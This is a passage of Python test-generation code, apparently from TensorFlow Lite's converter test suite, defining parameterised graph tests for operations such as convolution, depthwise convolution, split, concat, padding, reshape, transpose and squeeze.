filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
input_tensors = [input_tensor]
    # Construct a constant weight tensor that is used by both Conv2D ops.
filter_tensor = tf.constant(
create_tensor_data(np.float32, filter_shape), dtype=tf.float32)
# Ensure that FuseBinaryIntoFollowingAffine works with an input which
# is shared by multiple affine ops.
conv_input = input_tensor + 0.1
# Construct 2 Conv2D operations which use exactly the same input and
# weights.
result1 = tf.nn.conv2d(
conv_input,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
result2 = tf.nn.conv2d(
conv_input,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
# Add MUL ops after Conv2D ops. These MUL ops should be fused into the
# weights of Conv2D.
result1 = result1 * 2
result2 = result2 * 3
# Add the 2 results up.
out = result1 + result2
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, unused_filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
# Note: This is a regression test for a bug (b/112303004) where Toco
# incorrectly transformed Conv into DepthwiseConv when two Conv ops share the
# same constant weight tensor.
@register_make_test_function()
def make_conv_to_depthwiseconv_with_shared_weights_tests(options):
"""Make a test where 2 Conv ops shared the same constant weight tensor."""
test_parameters = [{
"input_shape": [[1, 10, 10, 1]],
"filter_shape": [[3, 3]],
"strides": [[1, 1, 1, 1]],
"dilations": [[1, 1, 1, 1]],
"padding": ["SAME"],
"data_format": ["NHWC"],
"channel_multiplier": [3],
}]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_shape"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
    # Construct a constant weight tensor that is used by both Conv2D ops.
filter_tensor = tf.constant(
create_tensor_data(np.float32, filter_shape), dtype=tf.float32)
input_tensors = [input_tensor]
# Construct 2 Conv2D operations which use exactly the same input and
# weights.
result1 = tf.nn.conv2d(
input_tensor,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
result2 = tf.nn.conv2d(
input_tensor,
filter_tensor,
strides=parameters["strides"],
dilations=parameters["dilations"],
padding=parameters["padding"],
data_format=parameters["data_format"])
# Add the 2 results up.
out = result1 + result2
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, unused_filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_depthwiseconv_tests(options):
"""Make a set of tests to do convolution."""
# Tensorflow only supports equal strides
test_parameters = [
{
"input_shape": [[1, 3, 4, 3], [1, 10, 10, 3]],
"filter_size": [[1, 1], [1, 2], [3, 3]],
"strides": [[1, 1, 1, 1], [1, 3, 3, 1]],
"dilations": [[1, 1, 1, 1], [1, 3, 2, 1], [1, 2, 2, 1]],
"channel_multiplier": [1, 2],
"rate": [[1, 1]],
"padding": ["SAME", "VALID"],
"data_format": ["NHWC"],
"constant_filter": [True, False],
},
{
"input_shape": [[1, 3, 4, 3]],
"filter_size": [[1, 1]],
"strides": [[1, 1, 2, 1]], # TF needs [1, x, x, 1]
"dilations": [[1, 1, 1, 1], [1, 2, 2, 1]],
"channel_multiplier": [2],
"rate": [[2, 2]], # Only [1, 1] is supported
"padding": ["SAME"],
"data_format": ["NHWC"],
"constant_filter": [True, False],
}
]
def get_tensor_shapes(parameters):
input_shape = parameters["input_shape"]
filter_size = parameters["filter_size"]
filter_shape = filter_size + [
input_shape[3], parameters["channel_multiplier"]
]
return [input_shape, filter_shape]
def build_graph(parameters):
"""Build a depthwise conv graph given `parameters`."""
input_shape, filter_shape = get_tensor_shapes(parameters)
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=input_shape)
# Get filter input either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
filter_input = create_tensor_data(np.float32, filter_shape)
input_tensors = [input_tensor]
else:
filter_input = tf.placeholder(
dtype=tf.float32, name="filter", shape=filter_shape)
input_tensors = [input_tensor, filter_input]
out = tf.nn.depthwise_conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
rate=parameters["rate"],
padding=parameters["padding"],
data_format=parameters["data_format"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, filter_shape))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=4)
@register_make_test_function()
def make_split_tests(options):
"""Make a set of tests to do tf.split."""
test_parameters = [{
"input_shape": [[1, 3, 4, 6], [2, 4, 1], [6, 4], [8]],
"num_or_size_splits": [1, 2, 3, 4, 5],
"axis": [0, 1, 2, 3, -4, -3, -2, -1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.split(
input_tensor, parameters["num_or_size_splits"], parameters["axis"])
return [input_tensor], [out[0]]
def build_inputs(parameters, sess, inputs, outputs):
values = [create_tensor_data(np.float32, parameters["input_shape"])]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=112)
@register_make_test_function()
def make_splitv_tests(options):
"""Make a set of tests to do tf.split_v."""
test_parameters = [{
"input_shape": [[1, 3, 4, 6], [2, 4, 1], [6, 4], [8]],
"size_splits": [[2, 2], [1, 3], [4, 2], [5, 3],
[-1, 1], [-1, 2], [-1, 4]],
"axis": [0, 1, 2, 3, -4, -3, -2, -1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.split(input_tensor, parameters["size_splits"], parameters["axis"])
return [input_tensor], [out[0]]
def build_inputs(parameters, sess, inputs, outputs):
values = [create_tensor_data(np.float32, parameters["input_shape"])]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=158)
@register_make_test_function()
def make_concat_tests(options):
"""Make a set of tests to do concatenation."""
test_parameters = [{
"base_shape": [[1, 3, 4, 3], [3, 4]],
"num_tensors": [1, 2, 3, 4, 5, 6],
"axis": [0, 1, 2, 3, -3, -2, -1],
"type": [tf.float32, tf.uint8, tf.int32, tf.int64],
}]
def get_shape(parameters, delta):
"""Return a tweaked version of 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
if axis < 0:
axis += len(shape)
if axis < len(shape):
shape[axis] += delta
return shape
def build_graph(parameters):
all_tensors = []
for n in range(0, parameters["num_tensors"]):
input_tensor = tf.placeholder(dtype=parameters["type"],
name=("input%d" % n),
shape=get_shape(parameters, n))
all_tensors.append(input_tensor)
out = tf.concat(all_tensors, parameters["axis"])
return all_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
all_values = []
for n in range(0, parameters["num_tensors"]):
input_values = create_tensor_data(
parameters["type"], get_shape(parameters, n))
all_values.append(input_values)
return all_values, sess.run(
outputs, feed_dict=dict(zip(inputs, all_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=60)
@register_make_test_function()
def make_fully_connected_tests(options):
"""Make a set of tests to do fully_connected."""
test_parameters = [{
"shape1": [[3, 3]],
"shape2": [[3, 3]],
"transpose_a": [True, False],
"transpose_b": [True, False],
"constant_filter": [True, False],
}, {
"shape1": [[4, 4], [1, 4], [4]],
"shape2": [[4, 4], [4, 1], [4]],
"transpose_a": [False],
"transpose_b": [False],
"constant_filter": [True, False],
}, {
"shape1": [[40, 37]],
"shape2": [[37, 40]],
"transpose_a": [False],
"transpose_b": [False],
"constant_filter": [True, False],
}, {
"shape1": [[40, 37]],
"shape2": [[40, 37]],
"transpose_a": [False],
"transpose_b": [True],
"constant_filter": [True, False],
}]
def build_graph(parameters):
"""Build a matmul graph given `parameters`."""
input_tensor1 = tf.placeholder(dtype=tf.float32, name="input1",
shape=parameters["shape1"])
# Get input_tensor2 either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
input_tensor2 = create_tensor_data(np.float32, parameters["shape2"])
input_tensors = [input_tensor1]
else:
input_tensor2 = tf.placeholder(
dtype=tf.float32, name="input2", shape=parameters["shape2"])
input_tensors = [input_tensor1, input_tensor2]
out = tf.matmul(input_tensor1, input_tensor2,
transpose_a=parameters["transpose_a"],
transpose_b=parameters["transpose_b"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input_values1) or 2
# tensors (input_values1, input_values2) based on whether the second input
# is a constant or variable input.
values = [create_tensor_data(np.float32, shape=parameters["shape1"])]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, parameters["shape2"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=10)
@register_make_test_function()
def make_l2norm_tests(options):
"""Make a set of tests to do l2norm."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[5, 7], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
"dim": [0, 1, 2, 3, [2, 3], -2],
"epsilon": [None, 1e-12, 1e-3],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
if parameters["epsilon"]:
out = tf.nn.l2_normalize(
input_tensor, parameters["dim"], epsilon=parameters["epsilon"])
else:
out = tf.nn.l2_normalize(input_tensor, parameters["dim"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=9)
@register_make_test_function()
def make_local_response_norm_tests(options):
"""Make a set of tests to do local_response_norm."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3]],
"depth_radius": [None, 0, 1, 3, 5],
"bias": [None, 0.3, -0.1],
"alpha": [None, 2, -3],
"beta": [None, 0.25, 2],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.local_response_normalization(
input_tensor, depth_radius=parameters["depth_radius"],
bias=parameters["bias"], alpha=parameters["alpha"],
beta=parameters["beta"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_pad_tests(options):
"""Make a set of tests to do pad."""
# TODO(nupurgarg): Add test for tf.uint8.
test_parameters = [
# 4D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 1, 2, 1], [2, 1, 1, 1]],
"paddings": [[[0, 0], [0, 1], [2, 3], [0, 0]], [[0, 1], [0, 0],
[0, 0], [2, 3]]],
"constant_paddings": [True, False],
},
# 2D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2]],
"paddings": [[[0, 1], [2, 3]]],
"constant_paddings": [True, False],
},
# 1D:
{
"dtype": [tf.int32],
"input_shape": [[1]],
"paddings": [[[1, 2]]],
"constant_paddings": [False],
},
]
def build_graph(parameters):
"""Build a pad graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
# Get paddings as either a placeholder or constants.
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="padding", shape=shape)
input_tensors = [input_tensor, paddings]
out = tf.pad(input_tensor, paddings=paddings)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_padv2_tests(options):
"""Make a set of tests to do padv2."""
# TODO(nupurgarg): Add test for tf.uint8.
test_parameters = [
# 4D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 1, 2, 1], [2, 1, 1, 1]],
"paddings": [[[0, 0], [0, 1], [2, 3], [0, 0]], [[0, 1], [0, 0],
[0, 0], [2, 3]]],
"constant_paddings": [True, False],
"constant_values": [0, 2],
},
# 2D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2]],
"paddings": [[[0, 1], [2, 3]]],
"constant_paddings": [True, False],
"constant_values": [0, 2],
},
# 1D:
{
"dtype": [tf.int32],
"input_shape": [[1]],
"paddings": [[[0, 1]]],
"constant_paddings": [False],
"constant_values": [0, 2],
},
]
def build_graph(parameters):
"""Build a pad graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
# Get paddings as either a placeholder or constants.
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="padding", shape=shape)
input_tensors = [input_tensor, paddings]
out = tf.pad(input_tensor, paddings=paddings,
constant_values=parameters["constant_values"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reshape_tests(options):
"""Make a set of tests to do reshape."""
# All shapes below are suitable for tensors with 420 elements.
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[3, 4, 5, 7], [4, 105], [21, 5, 2, 2], [420]],
"output_shape": [[15, 28], [420], [1, -1, 5, 7], [-1]],
"constant_shape": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1]],
"output_shape": [[]],
"constant_shape": [True, False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
# Get shape as either a placeholder or constants.
if parameters["constant_shape"]:
output_shape = parameters["output_shape"]
input_tensors = [input_tensor]
else:
# The shape of the shape tensor.
shape_tensor_shape = [len(parameters["output_shape"])]
output_shape = tf.placeholder(
dtype=tf.int32, name="output_shape", shape=shape_tensor_shape)
input_tensors = [input_tensor, output_shape]
out = tf.reshape(input_tensor, shape=output_shape)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_shape"]:
values.append(np.array(parameters["output_shape"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_shape_tests(options):
"""Make a set of tests to do shape."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [0], [1, 1, 1, 3], [2, 3, 4, 5], [5, 5], [10]],
"out_type": [tf.int32, tf.int64],
}]
def build_graph(parameters):
"""Build the shape op testing graph."""
# Note that we intentionally leave out the shape from the input placeholder
# to prevent the Shape operation from being optimized out during conversion.
input_value = tf.placeholder(dtype=parameters["input_dtype"], name="input")
out = tf.shape(input_value, out_type=parameters["out_type"])
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_rank_tests(options):
"""Make a set of tests to do rank."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [0], [1, 1, 1, 3], [2, 3, 4, 5], [5, 5], [10]],
}]
def build_graph(parameters):
"""Build the rank op testing graph."""
input_value = tf.placeholder(dtype=parameters["input_dtype"], name="input")
out = tf.rank(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_one_hot_tests(options):
"""Make a set of tests to do one_hot."""
test_parameters = [{
"indices_type": [tf.int32, tf.int64],
"indices_shape": [[3], [4, 4], [1, 5], [5, 1]],
"axis": [0, 1],
"dtype": [tf.int32, tf.int64, tf.float32],
"provide_optional_inputs": [True, False],
}]
def build_graph(parameters):
indices = tf.placeholder(
dtype=parameters["indices_type"],
name="indices",
shape=parameters["indices_shape"])
depth = tf.placeholder(dtype=tf.int32, name="depth", shape=())
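    # Without the optional inputs, tf.one_hot falls back to its defaults
    # (on_value=1, off_value=0) and only indices and depth are graph inputs.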
if not parameters["provide_optional_inputs"]:
out = tf.one_hot(indices=indices, depth=depth)
return [indices, depth], [out]
on_value = tf.placeholder(
dtype=parameters["dtype"], name="on_value", shape=())
off_value = tf.placeholder(
dtype=parameters["dtype"], name="off_value", shape=())
out = tf.one_hot(
indices=indices,
depth=depth,
on_value=on_value,
off_value=off_value,
axis=parameters["axis"],
dtype=parameters["dtype"])
return [indices, depth, on_value, off_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = [
create_tensor_data(
parameters["indices_type"],
shape=parameters["indices_shape"],
min_value=-1,
max_value=10),
create_tensor_data(tf.int32, shape=None, min_value=1, max_value=10),
]
if parameters["provide_optional_inputs"]:
input_values.append(
create_tensor_data(
parameters["dtype"], shape=None, min_value=1, max_value=10))
input_values.append(
create_tensor_data(
parameters["dtype"], shape=None, min_value=-1, max_value=0))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_resize_bilinear_tests(options):
"""Make a set of tests to do resize_bilinear."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, True, False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.image.resize_bilinear(input_tensor, size=parameters["size"],
align_corners=parameters["align_corners"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_resize_nearest_neighbor_tests(options):
"""Make a set of tests to do resize_nearest_neighbor."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.image.resize_nearest_neighbor(
input_tensor,
size=parameters["size"],
align_corners=parameters["align_corners"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_sigmoid_tests(options):
"""Make a set of tests to do sigmoid."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [4], [], [1, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.sigmoid(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_softmax_tests(options):
"""Make a set of tests to do softmax."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [2, 3]],
"dim": [-1, 0],
}, {
"dtype": [tf.float32],
"input_shape": [[4, 7]],
"dim": [-1, 1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.nn.softmax(input_tensor, dim=parameters["dim"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_space_to_depth_tests(options):
"""Make a set of tests to do space_to_depth."""
test_parameters = [{
"dtype": [tf.float32, tf.int32, tf.uint8, tf.int64],
"input_shape": [[2, 12, 24, 1]],
"block_size": [2, 3, 4],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.space_to_depth(input_tensor, block_size=parameters["block_size"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_space_to_batch_nd_tests(options):
"""Make a set of tests to do space_to_batch_nd."""
# TODO(nupurgarg): Add test for uint8.
test_parameters = [
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2, 2, 3], [2, 2, 4, 1]],
"block_shape": [[1, 3], [2, 2]],
"paddings": [[[0, 0], [0, 0]], [[0, 0], [2, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
{
"dtype": [tf.float32],
"input_shape": [[2, 3, 7, 3]],
"block_shape": [[1, 3], [2, 2]],
"paddings": [[[0, 0], [2, 0]], [[1, 0], [1, 0]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
      # Non-4D use case: 1 batch dimension, 3 spatial dimensions, 2 others.
{
"dtype": [tf.float32],
"input_shape": [[1, 4, 4, 4, 1, 1]],
"block_shape": [[2, 2, 2]],
"paddings": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
]
def build_graph(parameters):
"""Build a space_to_batch graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.placeholder(dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get paddings either as a const or as a placeholder (tensor).
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="paddings", shape=shape)
input_tensors.append(paddings)
out = tf.space_to_batch_nd(input_tensor, block_shape, paddings)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=56)
@register_make_test_function()
def make_batch_to_space_nd_tests(options):
"""Make a set of tests to do batch_to_space_nd."""
test_parameters = [
{
"dtype": [tf.float32, tf.int64, tf.int32],
"input_shape": [[12, 3, 3, 1]],
"block_shape": [[1, 4], [2, 2], [3, 4]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
},
# Single batch (no-op)
{
"dtype": [tf.float32],
"input_shape": [[1, 3, 3, 1]],
"block_shape": [[1, 1]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True],
"constant_crops": [True],
},
# Non-4D use case: 1 batch dimension, 3 spatial dimensions, 2 others.
{
"dtype": [tf.float32],
"input_shape": [[8, 2, 2, 2, 1, 1]],
"block_shape": [[2, 2, 2]],
"crops": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
},
]
def build_graph(parameters):
"""Build a batch_to_space graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.placeholder(dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get crops either as a const or as a placeholder (tensor).
if parameters["constant_crops"]:
crops = parameters["crops"]
else:
shape = [len(parameters["crops"]), 2]
crops = tf.placeholder(dtype=tf.int32, name="crops", shape=shape)
input_tensors.append(crops)
out = tf.batch_to_space_nd(input_tensor, block_shape, crops)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_crops"]:
values.append(np.array(parameters["crops"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_transpose_tests(options):
"""Make a set of tests to do transpose."""
# TODO(nupurgarg): Add test for uint8.
test_parameters = [{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[2, 2, 3]],
"perm": [[0, 1, 2], [0, 2, 1]],
"constant_perm": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1, 2, 3, 4]],
"perm": [[0, 1, 2, 3], [3, 0, 1, 2]],
"constant_perm": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1, 2, 3, 4, 5]],
"perm": [[4, 3, 2, 1, 0]],
"constant_perm": [True, False],
}]
def build_graph(parameters):
"""Build a transpose graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["constant_perm"]:
perm = parameters["perm"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["perm"]), 2]
perm = tf.placeholder(dtype=tf.int32, name="perm", shape=shape)
input_tensors = [input_tensor, perm]
out = tf.transpose(input_tensor, perm=perm)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_perm"]:
values.append(np.array(parameters["perm"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=9)
@register_make_test_function()
def make_squeeze_tests(options):
"""Make a set of tests to do squeeze."""
test_parameters = [{
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 2, 1, 3, 1, 4, 1, 1]],
"axis": [
None, [], [0, 2], [4, 7], [-1, 0, 2, 0, 7, -6], [1], [2, 3, 2],
[-1, -2, -4, -6, -8], [0, 2, 4, 6, 7], [7, 6, 4, 2, 0], [6, 6],
[0, 1, 2, 3, 4, 5, 6, 7], [-2, -3, 1, 0, 7, -5]
],
}, {
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1]],
"axis": [None, [], [0], [-1]],
}, {
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 1, 1, 1, 1]],
"axis": [None, [], [0], [3, 0], [-2, 0, 3, 2]],
}]
